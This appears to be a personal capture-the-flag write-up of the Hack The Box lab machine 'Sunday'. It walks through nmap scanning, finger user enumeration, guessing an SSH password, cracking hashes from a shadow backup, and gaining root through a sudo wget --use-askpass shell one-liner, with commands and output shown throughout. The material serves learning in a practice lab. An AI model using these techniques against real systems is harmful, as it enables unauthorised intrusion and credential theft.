Sunday - wook413

#hackthebox #easy #linux #solaris #finger #SUID #wget ![[Pasted image 20250728221540.png]] # Information Gathering - Nmap TCP scan against all ports revealed 5 open ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-29 01:11 UTC Nmap scan report for 10.10.10.76 Host is up (0.048s latency). Not shown: 63770 filtered tcp ports (no-response), 1760 closed tcp ports (reset) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 79/tcp open finger 111/tcp open rpcbind 515/tcp open printer 6787/tcp open smc-admin 22022/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 43.67 seconds ``` Another TCP scan against the open ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 79,111,515,6787,22022 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-29 01:15 UTC Nmap scan report for 10.10.10.76 Host is up (0.049s latency). PORT STATE SERVICE VERSION 79/tcp open finger? | fingerprint-strings: | GenericLines: | No one logged on | GetRequest: | Login Name TTY Idle When Where | HTTP/1.0 ??? | HTTPOptions: | Login Name TTY Idle When Where | HTTP/1.0 ??? | OPTIONS ??? | Help: | Login Name TTY Idle When Where | HELP ??? | RTSPRequest: | Login Name TTY Idle When Where | OPTIONS ??? | RTSP/1.0 ??? | SSLSessionReq, TerminalServerCookie: |_ Login Name TTY Idle When Where |_finger: No one logged on\x0D 111/tcp open rpcbind 2-4 (RPC #100000) 515/tcp open printer 6787/tcp open http Apache httpd |_http-server-header: Apache |_http-title: 400 Bad Request 22022/tcp open ssh OpenSSH 8.4 (protocol 2.0) | ssh-hostkey: | 2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA) |_ 256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port79-TCP:V=7.95%I=7%D=7/29%Time=688820C0%P=x86_64-pc-linux-gnu%r(Gene <SNIP> Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 92.98 seconds ``` A UDP scan against top 10 ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 -Pn Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-29 01:18 UTC Nmap scan report for 10.10.10.76 Host is up (0.050s latency). PORT STATE SERVICE 53/udp closed domain 67/udp closed dhcps 123/udp closed ntp 135/udp closed msrpc 137/udp closed netbios-ns 138/udp closed netbios-dgm 161/udp closed snmp 445/udp closed microsoft-ds 631/udp closed ipp 1434/udp closed ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds ``` --- # Enumeration ##### Finger - TCP 79 It was my first time facing a `Finger` protocol. I have never heard of it until now. I didn't know how to approach it so I headed to `hacktricks.wiki` and I followed all the enumeration techniques listed there. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ finger @$IP No one logged on ┌──(kali㉿kali)-[~/Desktop] └─$ echo "root" | nc -nv $IP 79 (UNKNOWN) [10.10.10.76] 79 (finger) open Login Name TTY Idle When Where root Super-User ssh <Dec 7, 2023> 10.10.14.46 ┌──(kali㉿kali)-[~/Desktop] └─$ finger admin@$IP Login Name TTY Idle When Where adm Admin < . . . . > dladm Datalink Admin < . . . . > netadm Network Admin < . . . . > netcfg Network Configuratio < . . . . > dhcpserv DHCP Configuration A < . . . . > ikeuser IKE Admin < . . . . > lp Line Printer Admin < . . . . > ┌──(kali㉿kali)-[~/Desktop] └─$ finger user@$IP Login Name TTY Idle When Where aiuser AI User < . . . . > openldap OpenLDAP User < . . . . > nobody NFS Anonymous Access < . . . . > noaccess No Access User < . . . . > nobody4 SunOS 4.x NFS Anonym < . . . . > ``` `hacktricks` also suggested `finger-use-enum.pl` from `Pentest Monkey` which is a tool for enumerating OS-level user accounts via the finger service. I downloaded the tool in my Kali and ran it against the target IP address. I found 16 entries but the ones caught my eyes were `root`, `sammy`, and `sunny` because these appear to be running in the `SSH`. ![[Pasted image 20250728210653.png]] I tried common passwords for CTFs like `admin` and `password` but failed. Then I thought to try the name of the box, which is `sunday`. It turned out the user `sunny`'s password is `sunday` ![[Pasted image 20250728211846.png]] # Initial Access - SSH 22022 (Shell as sunny) I successfully logged in but it didn't look like a typical SSH. It displayed `Oracle Solaris` ![[Pasted image 20250728212022.png]] `user.txt` file was in `/home/sammy` but sunny doesn't have permission to read sammy's directory. ```bash sunny@sunday:/home/sammy$ ls user.txt sunny@sunday:/home/sammy$ cat user.txt cat: cannot open user.txt: Permission denied ``` # Lateral Movement - To `sammy` I tried `sudo -l` command to see if our current user `sunny` can run any command with `sudo` privilege. There was one: `/root/troll` but as the name suggested I think its purpose was really to troll people because I was not able to read it and executing it returned meaningless stuffs haha. ```bash sunny@sunday:/home/sammy$ sudo -l User sunny may run the following commands on sunday: (root) NOPASSWD: /root/troll ``` Then in `/backup` directory I found 2 backup files. ![[Pasted image 20250728213852.png]] Both files contained the same contents, I confirmed it with `diff`. ![[Pasted image 20250728214255.png]] Not sure if it's a copy of `/etc/shadow` file but the name of one of the file is `shadow.backup`, so there's a high chance it's a copy of shadow. I'm going to grab `/etc/passwd` and try `unshadow` to retrieve their passwords. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ cat passwd2.txt && cat shadow2.txt sammy:x:100:10::/home/sammy:/usr/bin/bash sunny:x:101:10::/home/sunny:/usr/bin/bash sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445:::::: sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636:::::: ┌──(kali㉿kali)-[~/Desktop] └─$ unshadow passwd2.txt shadow2.txt sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:100:10::/home/sammy:/usr/bin/bash sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:101:10::/home/sunny:/usr/bin/bash ┌──(kali㉿kali)-[~/Desktop] └─$ unshadow passwd2.txt shadow2.txt > clear.txt ``` Got the passwords! ![[Pasted image 20250728220640.png]] logged in as `sammy` ![[Pasted image 20250728220826.png]] Got `user.txt` ``` bash-5.1$ cat user.txt 1371... ``` # Privilege Escalation - To `root` `sudo -l` revealed `sammy` can execute `wget` with root privilege. By the name of the binary, I think this one is genuine, I hope I'm not getting trolled again ```bash bash-5.1$ sudo -l User sammy may run the following commands on sunday: (root) NOPASSWD: /usr/bin/wget ``` Successfully obtained the shell as `root`! ```bash bash-5.1$ TF=$(mktemp) chmod +x $TF echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF sudo wget --use-askpass=$TF 0 root@sunday:/home/sammy# whoami root ``` Got `root.txt`! ``` ```bash root@sunday:~# ls -l total 8 -rw-r--r-- 1 root root 126 Dec 19 2021 overwrite -rw------- 1 root root 33 Jul 29 01:03 root.txt -rwxr-xr-x 1 root root 53 Jul 29 03:14 troll -rw-r--r-- 1 root root 53 Dec 19 2021 troll.original root@sunday:~# cat root.txt 0f1... ``` --- There's also the `troll` file haha ```bash root@sunday:~# cat overwrite #!/usr/bin/bash while true; do /usr/gnu/bin/cat /root/troll.original > /root/troll /usr/gnu/bin/sleep 5 done root@sunday:~# cat troll #!/usr/bin/bash /usr/bin/echo "testing" /usr/bin/id root@sunday:~# cat troll.original #!/usr/bin/bash /usr/bin/echo "testing" /usr/bin/id ```